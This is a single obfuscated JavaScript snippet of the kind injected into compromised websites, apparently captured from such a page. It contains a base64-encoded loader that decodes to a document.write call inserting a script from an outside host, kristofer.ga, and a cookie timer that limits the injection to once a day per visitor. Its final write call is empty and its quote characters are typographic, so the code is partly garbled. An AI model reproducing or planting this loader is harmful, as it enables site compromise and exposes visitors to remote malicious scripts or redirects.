  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}